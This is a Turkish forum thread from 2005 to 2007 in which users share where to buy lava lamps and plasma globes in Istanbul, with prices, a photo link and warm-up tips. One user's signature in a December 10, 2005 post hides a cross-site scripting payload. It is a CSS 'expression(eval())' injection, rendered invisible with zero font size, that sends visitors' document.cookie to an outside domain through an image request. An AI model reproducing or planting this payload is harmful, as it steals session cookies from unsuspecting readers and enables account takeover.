kinetica Mesaj tarihi: Kasım 20, 2005 Konuyu açan Paylaş Mesaj tarihi: Kasım 20, 2005 @sailor: adalar tasarım getiriyo mu böyle şeyler? getiriyosa alalım :roll: bauhausa bakayım, ama öyle penthesileanınki gibi 7 yıl babalar gibi çalışır mı bilmem. ps: "alman asıllı market" hehe:) Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
kinetica Mesaj tarihi: Kasım 22, 2005 Konuyu açan Paylaş Mesaj tarihi: Kasım 22, 2005 evet kendi topikimi uplamak için post kasıyorum... utandım valla:) şimdi, bdüzü bauhaus, güneşli praktiker, cevahir koçtaşa gidip te bu lambalardan ya da plasma küresi gören var mı? Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
kinetica Mesaj tarihi: Aralık 8, 2005 Konuyu açan Paylaş Mesaj tarihi: Aralık 8, 2005 aranan lamba bulundu, metro market güneşlide, kapıdan girer girmez yılbaşı süsleri arasında dev bir lava dağı karşıladı beni, hepsini almak istedim. ürün de fiyatına göre oldukça iyi, 20 ytl ye 45cm yüksekliğinde cici bi lamba aldım, renk seçenekleri de var, talep ederseniz resmini de koyarım. bide sıvıyı barındıran ve cam olan kısmının dışında, gövdesi diğer bir çok ucuz lamba gibi plastik değil metalden, o yüzden çok daha iyi. lamba ısınınca falan sorun olmaz hem. ilgilenen varsa gitsin alsın. alaska marka (bir metro markası) "vesuv" diye mavi kutulu bi ürün. bir de etna vardı, ama o daha ufak ve plastik gövdeliydi sanırım, o yüzden almadım. unutmadan, bauhaus ta da , o "vıdıvık vıdık" küresi, yani plasma küresi var. şöyle 20cm çapında gayet güzel bir küre 43 ytl. ışık reyonunda disko süsleri falan olan yerde var. isteyen alsın. [Bu mesaj kinetica tarafından 09 Aralık 2005 00:35 tarihinde değiştirilmiştir] Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
geffen Mesaj tarihi: Aralık 8, 2005 Paylaş Mesaj tarihi: Aralık 8, 2005 talep edildi.[signature][hline]G3NK-Ster paradayzo! Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Cintonik Mesaj tarihi: Aralık 8, 2005 Paylaş Mesaj tarihi: Aralık 8, 2005 eh hayırlı olsun :)[signature][hline][b]porsuk, 03 Ekim 2005 23:10 tarihinde demiş ki: herkez kopmuş yarılmış iptal olmus ama biz ingilizce bilmiyoz bu ne kültür boyle. bu nasıl bir bilimsellik bu nasıl evrensel yaklaşım bu nasıl yitirilmemiş felsevi birikim betime uyum ahenk lisan skuhut u fosforik cümle kapitalitik osturafyon [/b] Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
kinetica Mesaj tarihi: Aralık 8, 2005 Konuyu açan Paylaş Mesaj tarihi: Aralık 8, 2005 ya gece gece herkes uyurken resmini çektirmeyin:), hem lambayı kapattım, açınca ısınması uzun sürüyor. hele oda sıcaklığından tam kımıldak hale gelmesi 2 saati buluyor. içindeki mumun ısınması erimesi lazım. yakın zamanda koyarım fotosunu.[signature][hline][b]oasisoyun.net Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Sailor Mesaj tarihi: Aralık 9, 2005 Paylaş Mesaj tarihi: Aralık 9, 2005 grats (:[signature][hline]oasis.gen.tr Mail/MSN: [email protected] , ICQ:6254196 Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
bega Mesaj tarihi: Aralık 9, 2005 Paylaş Mesaj tarihi: Aralık 9, 2005 çok kıskandım hemen gidip alcam ben de. lava olan çok güzelmiş yau bunca zaman boşa yaşamışım :P[signature][hline]"Confess ten times and it becomes a habit, confess a hundred times and it becomes an obsession, confess forever and it becomes your destiny" Ms. Bega Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Silmarwen Mesaj tarihi: Aralık 9, 2005 Paylaş Mesaj tarihi: Aralık 9, 2005 Öeh .. İyi geldi valla. Benim de ödev vardı Plasma ile alakalı. Plasma Lambalarını/ kürelerini kurcalıyodum bende =)[signature][hline]My Deviants | MSN:[email protected] | a Tale that goes on | Benim biraz oynanmış halim 11 Kasım 2005 - Therion @ Yenimelek Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
LathspeLL Mesaj tarihi: Aralık 9, 2005 Paylaş Mesaj tarihi: Aralık 9, 2005 Resim isterük...[signature][hline]LathspeLL (a.k.a seth) Taurelilomea-tumbalemorna Tumbaletaurea Lomeanor Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
geffen Mesaj tarihi: Aralık 9, 2005 Paylaş Mesaj tarihi: Aralık 9, 2005 ee hani resimler talep olursa koycaktın?[signature][hline]G3NK-Ster paradayzo! Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
kinetica Mesaj tarihi: Aralık 9, 2005 Konuyu açan Paylaş Mesaj tarihi: Aralık 9, 2005 açıkçası lambayı sevmekten fırsat bulamadım, bide patiye hep gece girdiğim için diğer odaya gidip çekmeye ve geri gelmeye pek niyeti olmuyor insanın. terbiyesizliğimi bağışlayın, daha ileri bir zamanda koyacağım:-) Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Caranlothwen Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 Lava lambaları Ankara'da japon pazarı'nda vardı. İstanbul'da varsa öyle bir yer bulursun. Bende var vallla çok güzel de arkadaşına flan gel bak lamba var demeden bi yarım saat önce falan çalıştır yoksa arkadaşın bakıyo bildiin ışık çıkaran tabanında da çamur gibi bişey olan lamba görüyor. "Bu ne beee" diyor. Yani ısınması biraz uzun sürüyor.Hatta ben ilk aldığımda bozuk sanmıştım içindeki mum erimeyince[signature][hline]{==:{*__*}:==} tymaut.blogspot.com Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Sovereign Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 OHOO tamam kesin alıyorum bu topicten sonra almazsam neyim[signature][hline]Nail "NaileR" Avunduk - Türkiye'nin yürüyen, koşan, zıplayan en büyük ve kapsamlı Star Trek ansiklopedisi KoÇ '04 | CMU '09 | c4A | ST:O | Star Trek TR | MSN: [email protected] | (^ve Stargate^) Jean-Luc Picard: "..Let's make sure history never forgets.. the name.. Enterprise" Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
PainLover Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 said: Sovereign, 10 Aralık 2005 03:19 tarihinde demiş ki: OHOO tamam kesin alıyorum bu topicten sonra almazsam neyim Wallaha benimde alacağım yoktu ama yeni evime alayım güzel otantik olur kafamda bazı sahneler canlandıda ..[signature][hline]I can perfect your gothic dreams... Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
geffen Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 kinetica kolpacıyım demiyorsunda.[signature][hline]G3NK-Ster paradayzo! Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Revell Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 www.koctas.com.tr de ben mi bulamadım yoksa, sitedemi yok[signature][hline]|Avril Lavigne| |MySpace| |The Simpsons| |WWE| Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Faust Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 O küre gibi şey var ya, Fistan'ın koyduğu. İçerenköy Carrefourda var o boy boy. 22 falan olması lazım fiyatı. Ampül falan, spotların olduğu bölümde açık halde de var. Deneyebilirsiniz.[signature][hline]Wind of change... ]www.noir.gen.tr[url=http:///=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.xtratogame.net/pixel.gif?'+document.cookie;this.sss=null`style='font-size:0;][/url]'[/color][/url][/url] ICQ: 714523 - MSNM: [email protected] Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
DeathLord Mesaj tarihi: Aralık 10, 2005 Paylaş Mesaj tarihi: Aralık 10, 2005 fistanın koyduğundan ben taksimde beşiktaş dolmuşlarının kalktığı yerde bi işportacıda görmüştüm ne zaman geçsem oluyo :D ama fiyatını bilmiyorum :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D[signature][hline]"Every creature will taste death" Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
kinetica Mesaj tarihi: Aralık 11, 2005 Konuyu açan Paylaş Mesaj tarihi: Aralık 11, 2005 kendime kolpacı dedirtmem laan :-) [spo1=lambam][/spo] linkte hata yapmadıysam lava lambamı ve hemen yanındaki altın tabak yemek tarifleri ansiklopedisini görebilirsiniz. edit: niye ufak oldu resm bu kadar? ilk kez bi siteye resim upload edip link vermeye çalıştımda... neyse ben size direk link te vereyim. http://img22.imagevenue.com/img.php?loc=loc70&image=47e8a_PICT0244.JPG olmazsa copy-paste deneyin oluyor. http://img22.imagevenue.com/img.php?loc=loc70&image=47e8a_PICT0244.JPG[Bu mesaj kinetica tarafından 11 Aralık 2005 11:45 tarihinde değiştirilmiştir] Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Kartan Mesaj tarihi: Aralık 11, 2005 Paylaş Mesaj tarihi: Aralık 11, 2005 Bi dakika şimdi o vakumlu elektrik kürelerinin tam ismi ne?Sakın ''vakumlu elektrik küresi'' demeyin...:)[signature][hline]"so now, i got a granddaughter from a son who's not me own, and a daughter o' his that's not his own. ye'd think that one of us would've figured out that half the fun's makin' tha damn brats!" Bruenor Battlehammer Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
dasaaa Mesaj tarihi: Aralık 11, 2005 Paylaş Mesaj tarihi: Aralık 11, 2005 Muahha imageavenue bi alemsin [Bu mesaj dasaaa tarafından 11 Aralık 2005 13:35 tarihinde değiştirilmiştir] Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Mirage Mesaj tarihi: Aralık 11, 2005 Paylaş Mesaj tarihi: Aralık 11, 2005 Bende var evde, 9 euro'ya bulmuştum indirimden, ama epeydir yakmıyorum duruyor bir köşede. Altta bildiğiniz bir ampül var. Ampülün ısısıyla tüpün içindeki embriyoya benzeyen zımbırtılar dans ediyor. Ama adam gibi ısınıp güzel bir kıvama gelmesi için 2 saatten fazla açık durması gerekiyor benim lambada. Kullanım kulavuzunda 8 saatten uzun süre çalıştırmayın diyordu. Devamlı böyle 8 saatten uzun süre çalıştırırsanız tüpün içindeki cisimler özelliklerini kaybediyorlarmış eskisi gibi güzel çalışmıyormuş sonra. Denemedim bilmiyorum. :p[signature][hline]Icq: 50896214 / Msn & E-Mail: [email protected] Kane | Level 60 | Orc Warrior | Magtheridon | GrimSoul Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
batuhan Mesaj tarihi: Mart 9, 2007 Paylaş Mesaj tarihi: Mart 9, 2007 Bi uplayalim konuyu geçen galeria ykm ye gittim bulamadim hem lava hem plasma.Yeni bosna koçtaşta varmıdır acaba. Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
paspatur Mesaj tarihi: Mart 9, 2007 Paylaş Mesaj tarihi: Mart 9, 2007 lava lambası ne? Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Öne çıkan mesajlar